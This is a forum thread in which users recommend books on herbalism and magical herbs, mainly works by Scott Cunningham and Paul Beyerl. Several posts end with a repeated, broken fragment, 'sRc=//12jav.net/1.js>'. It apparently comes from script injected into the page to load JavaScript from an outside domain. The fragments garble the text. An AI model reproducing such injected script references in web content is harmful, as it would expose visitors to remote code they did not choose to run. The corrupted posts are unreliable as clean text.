I suggest for you the book: The Master Book of Herbalism from Paul Beyerl. It is a good book, it says a lot of things based on herbalism. sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>

Scott Cunningham specializes in herbalism & also happens to be my favourite pagan author. So I highly recommend Cunningham's Encyclopedia of Magical Herbs. It contains information of around 400 different species of magickal herbs. sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>

I just actually got a copy of scott cunningham's encyclopedia, and it is a great book in my opinion. I just may have to collect full color pictures of the herbs to accompany it, as the book only has black and white drawings of the herbs.

I haven't read many other books on herbalism, but this book also list various health hazards of each herb.(if herbs are poisonous for example) This is a necessary piece of information if you intend on making teas, or consuming them in some other way. sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>

Anything by Gary Null, The Complete Encyclopedia Of Natural Healing in particular.
Someone well suggested Paul Beyrel's Master book of Herbalism.

I also agree that Scott Cunningham's Herbal Encyclopedia is a fantastic book and is easy to read, especially for those who are just starting out on their path in herbalism.

Also, I like the 'Master Book of Herbalism' by Paul Beyerl. Another good one is The Book of Herbal Wisdom: Using Plants as Medicines, by Matthew Wood. sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>

I suggest for Herbalism:

The Wicca Garden: A Modern Witch's Book of Magickal and Enchanted Herbs and Plants (Citadel Library of the Mystic Arts)
by Gerina Dunwich
Or
Magical Herbalism: The Secret Craft of the Wise (Llewellyn's Practical Magick Series) by Scott Cunningham
